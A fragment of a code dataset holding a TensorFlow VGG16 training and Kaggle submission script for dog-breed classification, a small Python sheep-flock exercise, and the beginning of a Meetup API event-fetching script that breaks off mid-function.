tf\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom tensorflow.contrib.layers import xavier_initializer_conv2d\nimport datetime\nimport pandas as pd\n\n\n# In[2]:\n\n\ninput_size = 224\nkeep_prob = 0.5\nnum_classes = 120\nlr_decay = 0.95\nnum_gens_to_wait = 250.\nnum_epochs = 200000\nbatch_size = 16\nlearning_rate = 0.0001\nregularztion_rate = 5 / (2 * 9200)\nmoving_average_decay = 0.99\n\n\n# In[ ]:\n\n\ntraining_filepath = \"../datasets/dog-breed-identification/train/\"\nlabels_file = pd.read_csv('../datasets/dog-breed-identification/labels.csv', index_col = 'id')\nfilewriter_path = \"../Models/dog_breed_identification\"\ncheckpoint_path = \"../Models/dog_breed_identification\"\nweight_file = '../Models/dogs_vs_cats_vgg16/vgg16_weights.npz'\n\ntraining_file = '../datasets/dog_breed_identification_training.tfrecords'\nevaluating_file = '../datasets/dog_breed_identification_evaluating.tfrecords'\n\nmodel_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt'\n\n\n# In[ ]:\n\n\ndef get_file(file_dir, labels_file):\n filenames = next(os.walk(file_dir))[2]\n num_files = len(filenames)\n labels_onehot = pd.get_dummies(labels_file['breed'])\n images = []\n labels = []\n for index, file in enumerate(filenames):\n images.append(os.path.join(file_dir, file))\n labels.append(list(labels_onehot.loc[file.split('.')[0]]))\n\n return images, labels\n\ndef get_batch(image_list, label_list, img_width, img_height, batch_size, capacity):\n\n image = tf.cast(image_list, tf.string)\n label = tf.cast(label_list, tf.int32)\n\n input_queue = tf.train.slice_input_producer([image, label])\n\n label = input_queue[1]\n image_contents = tf.read_file(input_queue[0])\n image = tf.image.decode_jpeg(image_contents, channels=3)\n\n image = tf.image.resize_image_with_crop_or_pad(image,img_width,img_height)\n image = tf.image.per_image_standardization(image) #将图片标准化\n image_batch, label_batch = tf.train.shuffle_batch([image, label], batch_size = batch_size, num_threads = 64, capacity = capacity, min_after_dequeue = batch_size)\n # label_batch = tf.reshape(label_batch, [batch_size])\n # print(label_batch)\n\n return image_batch, label_batch\n\n\n# In[ ]:\n\n\ndef batch_norm(inputs, is_training, is_conv_out = True, decay = 0.999):\n scale = tf.Variable(tf.ones([inputs.get_shape()[-1]]))\n beta = tf.Variable(tf.zeros([inputs.get_shape()[-1]]))\n pop_mean = tf.Variable(tf.zeros([inputs.get_shape()[-1]]), trainable = False)\n pop_var = tf.Variable(tf.ones([inputs.get_shape()[-1]]), trainable = False)\n\n if is_training:\n if is_conv_out:\n batch_mean, batch_var = tf.nn.moments(inputs, [0, 1, 2])\n else:\n batch_mean, batch_var = tf.nn.moments(inputs, [0])\n train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n train_var = tf.assign(pop_var, pop_var * decay + batch_var * (1 - decay))\n\n with tf.control_dependencies([train_mean, train_var]):\n return tf.nn.batch_normalization(inputs, batch_mean, batch_var, beta, scale, 0.001)\n else:\n return tf.nn.batch_normalization(inputs, pop_mean, pop_var, beta, scale, 0.001)\n\n\n# In[ ]:\n\n\nwith tf.name_scope('input_images') as scope:\n X = tf.placeholder(tf.float32, [None, input_size, input_size, 3], name = 'images')\n\nwith tf.name_scope('input_labels') as scope:\n Y = tf.placeholder(tf.float32, [None, num_classes], name = 'labels')\n\n\n# In[ ]:\n\n\ndef print_activations(t):\n print(t.op.name, ' ', t.get_shape().as_list())\n\ndef variable_summaries(name, var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope(name):\n # 计算参数的均值,并使用tf.summary.scaler记录\n mean = tf.reduce_mean(var)\n tf.summary.scalar(name + '/mean', mean)\n\n # 计算参数的标准差\n with tf.name_scope(name + '/stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n # 使用tf.summary.scaler记录记录下标准差,最大值,最小值\n tf.summary.scalar(name + '/stddev', stddev)\n tf.summary.scalar(name + '/max', tf.reduce_max(var))\n tf.summary.scalar(name + '/min', tf.reduce_min(var))\n # 用直方图记录参数的分布\n tf.summary.histogram(name + '/histogram', var)\n\ndef VGG16(images, keep_prob, num_classes, regularizer):\n var_list = []\n\n # with tf.name_scope('preprocess') as scope:\n # mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3], name='img_mean')\n # images = images - mean\n\n with tf.name_scope('conv1_1') as scope:\n W1 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 3, 64], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W1))\n b1 = tf.get_variable(name = scope + '/biases', shape = [64], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn1 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = images, filter = W1, strides = [1, 1, 1, 1], padding = 'SAME'), b1), True)\n # conv1 = tf.nn.bias_add(tf.nn.conv2d(input = images, filter = W1, strides = [1, 1, 1, 1], padding = 'SAME'), b1)\n conv1 = tf.nn.relu(bn1, name = scope)\n var_list += [W1, b1]\n\n variable_summaries(scope + '/weights', W1)\n variable_summaries(scope + '/biases', b1)\n variable_summaries(scope + '/conv', conv1)\n print_activations(conv1)\n\n with tf.name_scope('conv1_2') as scope:\n W2 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 64, 64], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W2))\n b2 = tf.get_variable(name = scope + '/biases', shape = [64], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn2 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv1, filter = W2, strides = [1, 1, 1, 1], padding = 'SAME'), b2), True)\n # conv2 = tf.nn.bias_add(tf.nn.conv2d(input = conv1, filter = W2, strides = [1, 1, 1, 1], padding = 'SAME'), b2)\n conv2 = tf.nn.relu(bn2, name = scope)\n var_list += [W2, b2]\n\n variable_summaries(scope + '/weights', W2)\n variable_summaries(scope + '/biases', b2)\n variable_summaries(scope + '/conv', conv2)\n print_activations(conv2)\n\n with tf.name_scope('pool1') as scope:\n max_pool1 = tf.nn.max_pool(value = conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool1)\n\n with tf.name_scope('conv2_1') as scope:\n W3 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 64, 128], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W3))\n b3 = tf.get_variable(name = scope + '/biases', shape = [128], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn3 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool1, filter = W3, strides = [1, 1, 1, 1], padding = 'SAME'), b3), True)\n # conv3 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool1, filter = W3, strides = [1, 1, 1, 1], padding = 'SAME'), b3)\n conv3 = tf.nn.relu(bn3, name = scope)\n var_list += [W3, b3]\n\n variable_summaries(scope + '/weights', W3)\n variable_summaries(scope + '/biases', b3)\n variable_summaries(scope + '/conv', conv3)\n print_activations(conv3)\n\n with tf.name_scope('conv2_2') as scope:\n W4 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 128, 128], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W4))\n b4 = tf.get_variable(name = scope + '/biases', shape = [128], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn4 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv3, filter = W4, strides = [1, 1, 1, 1], padding = 'SAME'), b4), True)\n # conv4 = tf.nn.bias_add(tf.nn.conv2d(input = conv3, filter = W4, strides = [1, 1, 1, 1], padding = 'SAME'), b4)\n conv4 = tf.nn.relu(bn4, name = scope)\n var_list += [W4, b4]\n\n variable_summaries(scope + '/weights', W4)\n variable_summaries(scope + '/biases', b4)\n variable_summaries(scope + '/conv', conv4)\n print_activations(conv4)\n\n with tf.name_scope('pool2') as scope:\n max_pool2 = tf.nn.max_pool(value = conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool2)\n\n with tf.name_scope('conv3_1') as scope:\n W5 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 128, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W5))\n b5 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n\n bn5 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool2, filter = W5, strides = [1, 1, 1, 1], padding = 'SAME'), b5), True)\n # conv5 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool2, filter = W5, strides = [1, 1, 1, 1], padding = 'SAME'), b5)\n conv5 = tf.nn.relu(bn5, name = scope)\n var_list += [W5, b5]\n\n variable_summaries(scope + '/weights', W5)\n variable_summaries(scope + '/biases', b5)\n variable_summaries(scope + '/conv', conv5)\n print_activations(conv5)\n\n with tf.name_scope('conv3_2') as scope:\n W6 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W6))\n b6 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn6 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv5, filter = W6, strides = [1, 1, 1, 1], padding = 'SAME'), b6), True)\n # conv6 = tf.nn.bias_add(tf.nn.conv2d(input = conv5, filter = W6, strides = [1, 1, 1, 1], padding = 'SAME'), b6)\n conv6 = tf.nn.relu(bn6, name = scope)\n var_list += [W6, b6]\n\n variable_summaries(scope + '/weights', W6)\n variable_summaries(scope + '/biases', b6)\n variable_summaries(scope + '/conv', conv6)\n print_activations(conv6)\n\n with tf.name_scope('conv3_3') as scope:\n W7 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 256], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W7))\n b7 = tf.get_variable(name = scope + '/biases', shape = [256], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn7 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv6, filter = W7, strides = [1, 1, 1, 1], padding = 'SAME'), b7), True)\n # conv7 = tf.nn.bias_add(tf.nn.conv2d(input = conv6, filter = W7, strides = [1, 1, 1, 1], padding = 'SAME'), b7)\n conv7 = tf.nn.relu(bn7, name = scope)\n var_list += [W7, b7]\n\n variable_summaries(scope + '/weights', W7)\n variable_summaries(scope + '/biases', b7)\n variable_summaries(scope + '/conv', conv7)\n print_activations(conv7)\n\n with tf.name_scope('pool3') as scope:\n max_pool3 = tf.nn.max_pool(value = conv7, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool3)\n\n with tf.name_scope('conv4_1') as scope:\n W8 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 256, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W8))\n b8 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn8 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool3, filter = W8, strides = [1, 1, 1, 1], padding = 'SAME'), b8), True)\n # conv8 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool3, filter = W8, strides = [1, 1, 1, 1], padding = 'SAME'), b8)\n conv8 = tf.nn.relu(bn8, name = scope)\n var_list += [W8, b8]\n\n variable_summaries(scope + '/weights', W8)\n variable_summaries(scope + '/biases', b8)\n variable_summaries(scope + '/conv', conv8)\n print_activations(conv8)\n\n with tf.name_scope('conv4_2') as scope:\n W9 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W9))\n b9 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn9 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv8, filter = W9, strides = [1, 1, 1, 1], padding = 'SAME'), b9), True)\n # conv9 = tf.nn.bias_add(tf.nn.conv2d(input = conv8, filter = W9, strides = [1, 1, 1, 1], padding = 'SAME'), b9)\n conv9 = tf.nn.relu(bn9, name = scope)\n var_list += [W9, b9]\n\n variable_summaries(scope + '/weights', W9)\n variable_summaries(scope + '/biases', b9)\n variable_summaries(scope + '/conv', conv9)\n print_activations(conv9)\n\n with tf.name_scope('conv4_3') as scope:\n W10 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W10))\n b10 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn10 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv9, filter = W10, strides = [1, 1, 1, 1], padding = 'SAME'), b10), True)\n # conv10 = tf.nn.bias_add(tf.nn.conv2d(input = conv9, filter = W10, strides = [1, 1, 1, 1], padding = 'SAME'), b10)\n conv10 = tf.nn.relu(bn10, name = scope)\n var_list += [W10, b10]\n\n variable_summaries(scope + '/weights', W10)\n variable_summaries(scope + '/biases', b10)\n variable_summaries(scope + '/conv', conv10)\n print_activations(conv10)\n\n with tf.name_scope('pool4') as scope:\n max_pool4 = tf.nn.max_pool(value = conv10, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool4)\n\n with tf.name_scope('conv5_1') as scope:\n W11 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W11))\n b11 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn11 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = max_pool4, filter = W11, strides = [1, 1, 1, 1], padding = 'SAME'), b11), True)\n # conv11 = tf.nn.bias_add(tf.nn.conv2d(input = max_pool4, filter = W11, strides = [1, 1, 1, 1], padding = 'SAME'), b11)\n conv11 = tf.nn.relu(bn11, name = scope)\n var_list += [W11, b11]\n\n variable_summaries(scope + '/weights', W11)\n variable_summaries(scope + '/biases', b11)\n variable_summaries(scope + '/conv', conv11)\n print_activations(conv11)\n\n with tf.name_scope('conv5_2') as scope:\n W12 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W12))\n b12 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn12 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv11, filter = W12, strides = [1, 1, 1, 1], padding = 'SAME'), b12), True)\n # conv12 = tf.nn.bias_add(tf.nn.conv2d(input = conv11, filter = W12, strides = [1, 1, 1, 1], padding = 'SAME'), b12)\n conv12 = tf.nn.relu(bn12, name = scope)\n var_list += [W12, b12]\n\n variable_summaries(scope + '/weights', W12)\n variable_summaries(scope + '/biases', b12)\n variable_summaries(scope + '/conv', conv12)\n print_activations(conv12)\n\n with tf.name_scope('conv5_3') as scope:\n W13 = tf.get_variable(name = scope + '/weights', shape = [3, 3, 512, 512], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W13))\n b13 = tf.get_variable(name = scope + '/biases', shape = [512], dtype = tf.float32, initializer = tf.constant_initializer(0.0))\n bn13 = batch_norm(tf.nn.bias_add(tf.nn.conv2d(input = conv12, filter = W13, strides = [1, 1, 1, 1], padding = 'SAME'), b13), True)\n # conv13 = tf.nn.bias_add(tf.nn.conv2d(input = conv12, filter = W13, strides = [1, 1, 1, 1], padding = 'SAME'), b13)\n conv13 = tf.nn.relu(bn13, name = scope)\n var_list += [W13, b13]\n\n variable_summaries(scope + '/weights', W13)\n variable_summaries(scope + '/biases', b13)\n variable_summaries(scope + '/conv', conv13)\n print_activations(conv13)\n\n with tf.name_scope('pool5') as scope:\n max_pool5 = tf.nn.max_pool(value = conv13, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n print_activations(max_pool5)\n\n flattened = tf.reshape(max_pool5, [-1, 7*7*512])\n print_activations(flattened)\n\n with tf.name_scope('fc1') as scope:\n W14 = tf.get_variable(name = scope + '/weights', shape = [7*7*512, 4096], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W14))\n b14 = tf.get_variable(name = scope + '/biases', shape = [4096], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn14 = batch_norm(tf.nn.bias_add(tf.matmul(flattened, W14), b14), True, False)\n # fc1 = tf.nn.bias_add(tf.matmul(flattened, W14), b14)\n fc1 = tf.nn.relu(bn14)\n var_list += [W14, b14]\n\n variable_summaries(scope + '/weights', W14)\n variable_summaries(scope + '/biases', b14)\n variable_summaries(scope + '/fc', fc1)\n print_activations(fc1)\n\n with tf.name_scope('dropout1') as scope:\n dropout1 = tf.nn.dropout(fc1, keep_prob = keep_prob, name = scope)\n print_activations(dropout1)\n\n with tf.name_scope('fc2') as scope:\n W15 = tf.get_variable(name = scope + '/weights', shape = [4096, 4096], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W15))\n b15 = tf.get_variable(name = scope + '/biases', shape = [4096], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn15 = batch_norm(tf.nn.bias_add(tf.matmul(dropout1, W15), b15), True, False)\n # fc2 = tf.nn.bias_add(tf.matmul(fc1, W15), b15)\n fc2 = tf.nn.relu(bn15)\n var_list += [W15, b15]\n\n variable_summaries(scope + '/weights', W15)\n variable_summaries(scope + '/biases', b15)\n variable_summaries(scope + '/fc', fc2)\n print_activations(fc2)\n\n with tf.name_scope('dropout2') as scope:\n dropout2 = tf.nn.dropout(fc2, keep_prob = keep_prob, name = scope)\n print_activations(dropout2)\n\n with tf.name_scope('fc3') as scope:\n W16 = tf.get_variable(name = scope + '/weights', shape = [4096, num_classes], dtype = tf.float32, initializer = xavier_initializer_conv2d())\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(W16))\n b16 = tf.get_variable(name = scope + '/biases', shape = [num_classes], dtype = tf.float32, initializer = tf.constant_initializer(0.1))\n bn16 = batch_norm(tf.nn.bias_add(tf.matmul(dropout2, W16), b16), True, False)\n # fc3 = tf.nn.bias_add(tf.matmul(fc2, W16), b16)\n fc3 = tf.nn.relu(bn16)\n var_list += [W16, b16]\n\n variable_summaries(scope + '/weights', W16)\n variable_summaries(scope + '/biases', b16)\n variable_summaries(scope + '/fc', fc3)\n print_activations(fc3)\n\n out = tf.nn.softmax(fc3)\n return fc3, out, var_list\n\n\n# In[ ]:\n\n\nregularizer = tf.contrib.layers.l2_regularizer(regularztion_rate)\nregularizer = None\n\n\n# In[ ]:\n\n\nfc3, out, var_list = VGG16(X, keep_prob, num_classes, regularizer)\ntf.add_to_collection('pred', out)\n\n\n# In[ ]:\n\n\nwith tf.name_scope('loss') as scope:\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(logits = fc3, labels = Y))\n # loss = cross_entropy + tf.add_n(tf.get_collection('losses'))\n loss = cross_entropy\n tf.summary.scalar('loss', loss)\n\n\n\n# In[ ]:\n\n\nwith tf.name_scope(\"accuracy\") as scope:\n correct_pred = tf.equal(tf.argmax(out, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\n\n\n# In[ ]:\n\n\nwith tf.name_scope('train') as scope:\n\n global_step = tf.Variable(tf.constant(0), trainable=False)\n #滑动平均模型,加快开始时的训练速度\n # variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)\n #对所有可训练参数应用滑动平均模型\n # variable_averages_op = variable_averages.apply(tf.trainable_variables())\n #指数衰减学习率,使得开始时学习率较大,后期趋向稳定\n model_learning_rate = tf.train.exponential_decay(\n learning_rate, global_step, num_gens_to_wait, lr_decay, staircase = False)\n # optimizer = tf.train.AdamOptimizer(learning_rate = model_learning_rate)\n # train_step = optimizer.minimize(loss, global_step = global_step)\n\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n gradients = tf.gradients(loss, var_list)\n gradients = list(zip(gradients, var_list))\n optimizer = tf.train.AdamOptimizer(learning_rate = model_learning_rate)\n\n train_op = optimizer.apply_gradients(grads_and_vars = gradients)\n\n #同时计算后���传播的参数和每一个参数的滑动平均值\n # with tf.control_dependencies([train_step, variable_averages_op]):\n # train_op = tf.no_op(name = scope)\n\n\n# In[ ]:\n\nmerged_summary = tf.summary.merge_all()\nwriter = tf.summary.FileWriter(filewriter_path)\nsaver = tf.train.Saver()\n\n\n# In[ ]:\n\n\ntraining_filename_queue = tf.train.string_input_producer(\n [training_file], shuffle=True)\nevaluating_filename_queue = tf.train.string_input_producer(\n [evaluating_file], shuffle=True)\n\ntraining_reader = tf.TFRecordReader()\nevaluating_reader = tf.TFRecordReader()\n\n_, training_serialized_example = training_reader.read(training_filename_queue)\n_, evaluating_serialized_example = evaluating_reader.read(evaluating_filename_queue)\n\ntraining_features = tf.parse_single_example(training_serialized_example, features={\n \"label_raw\": tf.FixedLenFeature([], tf.string),\n \"image_raw\": tf.FixedLenFeature([], tf.string)\n})\nevaluating_features = tf.parse_single_example(evaluating_serialized_example, features={\n \"label_raw\": tf.FixedLenFeature([], tf.string),\n \"image_raw\": tf.FixedLenFeature([], tf.string)\n})\n\ntraining_image = tf.decode_raw(training_features['image_raw'], tf.uint8)\ntraining_image = tf.reshape(training_image, [input_size, input_size, 3])\ntf.summary.image('training_input', training_image, 10)\ntraining_image = tf.image.per_image_standardization(training_image)\ntf.summary.image('standardization_training_input', training_image, 10)\ntraining_label = tf.decode_raw(training_features['label_raw'], tf.uint8)\ntraining_label = tf.reshape(training_label, [120])\ntraining_label = tf.cast(training_label, tf.int32)\n\nevaluating_image = tf.decode_raw(evaluating_features['image_raw'], tf.uint8)\nevaluating_image = tf.reshape(evaluating_image, [input_size, input_size, 3])\ntf.summary.image('training_input', evaluating_image, 10)\nevaluating_image = tf.image.per_image_standardization(evaluating_image)\ntf.summary.image('standardization_training_input', evaluating_image, 10)\nevaluating_label = tf.decode_raw(evaluating_features['label_raw'], tf.uint8)\nevaluating_label = tf.reshape(evaluating_label, [120])\nevaluating_label = tf.cast(evaluating_label, tf.int32)\n\ntraining_images, training_labels = tf.train.shuffle_batch(\n [training_image, training_label], batch_size = batch_size, num_threads = 2,\n capacity = 1000 + 3 * batch_size, min_after_dequeue = batch_size)\nevaluating_images, evaluating_labels = tf.train.shuffle_batch(\n [evaluating_image, evaluating_label], batch_size = batch_size, num_threads = 2,\n capacity = 1000 + 3 * batch_size, min_after_dequeue = batch_size * 2)\n\n\n# In[ ]:\n\n\nwith tf.Session() as sess:\n init = tf.global_variables_initializer()\n sess.run(init)\n\n # weights = np.load(weight_file)\n # keys = sorted(weights.keys())\n # for i, k in enumerate(keys):\n # if i == 26:\n # break\n # print(i, k, np.shape(weights[k]))\n # sess.run(var_list[i].assign(weights[k]))\n\n writer.add_graph(sess.graph)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess = sess, coord = coord)\n for i in range(num_epochs):\n training_batchX, training_batchY = sess.run([training_images, training_labels])\n\n _, loss_value, accu, lr_rate = sess.run(\n [train_op, cross_entropy, accuracy, model_learning_rate], feed_dict={X: training_batchX, Y: training_batchY})\n\n if i%10 == 0:\n s = sess.run(merged_summary, feed_dict={X: training_batchX, Y: training_batchY})\n writer.add_summary(s, i)\n\n # _, loss_value, accu = sess.run(\n # [train_op, loss, accuracy], feed_dict={X: training_batchX, Y: training_batchY})\n\n print('%s [Epoch: %d] The training loss is %g.'%(datetime.datetime.now(), i, loss_value))\n\n if i%100 == 0:\n evaluating_batchX, evaluating_batchY = sess.run([evaluating_images, evaluating_labels])\n evaluating_accu, evaluating_loss = sess.run([accuracy, loss], feed_dict={X: evaluating_batchX, Y: evaluating_batchY})\n\n print('The evaluating loss is %g, accuracy is %g'%(evaluating_loss, evaluating_accu))\n print(\n \"Afetr %d training step(s),loss on training batch is %g, accuracy is %g, learning_rate is %g.\"\n % (i,loss_value,accu, lr_rate))\n if i%10000 == 0:\n saver.save(sess, model_path + '.%d'%i)\n\n saver.save(sess, model_path)\n coord.request_stop()\n coord.join(threads)\n\nwriter.close()\n\n\n# In[1]:\n\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\n\n# In[2]:\n\n\nIMG_HEIGHT,IMG_WIDTH,IMG_CHANNELS = 224, 224, 3\n\nmeta_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt.160000.meta'\nmodel_path = '../Models/dog_breed_identification/VGG16_dog_breed_identification.ckpt.160000'\n\n\n# In[3]:\n\n\ntest_path = '../datasets/dog-breed-identification/test'\nsubmission_df = pd.read_csv('../datasets/dog-breed-identification/sample_submission.csv',\n index_col = 'id')\nsubmission_df.head()\n\n\n# In[10]:\n\n\nsubmission_data = []\n\nwith tf.Session() as sess:\n saver = tf.train.import_meta_graph(meta_path)\n saver.restore(sess, model_path)\n graph = tf.get_default_graph()\n\n X = graph.get_tensor_by_name('input_images/images:0')\n pred = tf.nn.softmax(tf.get_collection('pred')[0])\n\n init = tf.global_variables_initializer()\n sess.run(init)\n\n for file in submission_df.index:\n filename = file + '.jpg'\n image = Image.open(os.path.join(test_path, filename))\n image = np.array(image.resize((IMG_HEIGHT,IMG_WIDTH)))\n# image = tf.reshape(image, [IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS])\n image = tf.image.per_image_standardization(image)\n\n\n images = np.zeros((1, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS),dtype=np.uint8)\n images[0] = resize_img\n\n label_pred = sess.run(pred, feed_dict = {X: images})\n\n submission_list = list(np.zeros([120], dtype=np.uint8))\n print(label_pred)\n\n# submission_list = label_pred.tolist()\n\n submission_list[label_pred[0]] = 1\n print(submission_list)\n submission_list.insert(0, file)\n submission_data.append(submission_list)\n\n\n# In[ ]:\n\n\nsubmission_file = pd.DataFrame(submission_data)\nsubmission_file.index = submission_file[0]\nsubmission_file = submission_file.drop(0, 1)\nsubmission_file.head()\nsubmission_file.columns = submission_df.columns\nsubmission_file.index.name = 'id'\nsubmission_file.head()\n\n\n# In[ ]:\n\n\nsubmission_file.to_csv('../datasets/dog-breed-identification/submission.csv')\n","sub_path":"TensorFlow & PyTorch - 05.py","file_name":"TensorFlow & PyTorch - 05.py","file_ext":"py","file_size_in_byte":31497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564183022","text":"size = [5,7,300,90,24,50,75]\ni = 0\na = 1\nprint(\"Hi, I'm Linh the farmer. Here is the size of my sheeps:\\n\",size,\"\\n\")\nwant = int(input(\"Bạn muốn nuôi cừu trong bao nhiêu tháng?: \"))\n\nfor month in range(want):\n biggest = max(size)\n \n print(\"\\tCon cừu to nhất tháng này là\",biggest,\"\\n\\tCạo lông nó nào!!\\n\\t\\b\"+\"-- \"*10)\n \n size.remove(max(size))\n size.append(8)\n print(\"\\tAfter shearing, here is my flock:\\n\\t\",size)\n for number in size:\n number +=50\n size[i] = number\n i+=1\n i = 0 \n print(\"Month\", a, \":\\n\\t1 tháng trôi qua.. Đàn cừu hiện tại:\\n\\t\",size)\n a+=1 \n\nprint(\"--^-- \"*10,\"\\nThôi chán rồi, bán cừu đi du lịch thôi!! Giờ tớ đang có $ =\",sum(size)*2)\n","sub_path":"Fundamental/session3/homework/sheep.py","file_name":"sheep.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"327976381","text":"\"\"\"\ntheCodePutter\n\nPuts the code he findses on meetup.\n\"\"\"\n\nimport os\nimport json\nfrom datetime import datetime, timedelta\nfrom shutil import copyfile\nfrom subprocess import run\nfrom subprocess import PIPE\nfrom functools import reduce\nfrom pytz import timezone\nimport pytz\nimport reyaml\nimport requests\n\nclass Event(object):\n \"\"\"Represents the MeetUp event\"\"\"\n def __init__(self, id, name, time, duration, description, updated, venue_name, **kwargs):\n self.id = id # Using id from the meetup api, thus the name override.\n self.name = name\n self.time = time\n self.duration = duration\n self.description = description\n self.updated = updated\n self.venue_name = venue_name\n self.length = timedelta(milliseconds=self.duration)\n self.set_timezone()\n\n def __repr__(self):\n return json.dumps(self.__dict__)\n\n def _localize(self, the_time, zone=None):\n if zone is None:\n zone = pytz.utc\n utc = datetime.fromtimestamp(the_time)\n return utc.astimezone(zone)\n\n def set_timezone(self, time_zone=None):\n \"\"\"Applies the given timezone to the datetime values of the event\"\"\"\n self.when = self._localize(self.time, time_zone)\n self.modified = self._localize(self.updated, time_zone)\n\ndef get_next_event(api_key, api_root, group_name):\n \"\"\"Returns the next meetup event.\"\"\"\n url = \"{0}/{1}/events\".format(api_root, group_name)\n params = {\n \"scroll\": \"next_upcoming\",\n \"page\": \"1\",\n \"key\": api_key\n }\n response = 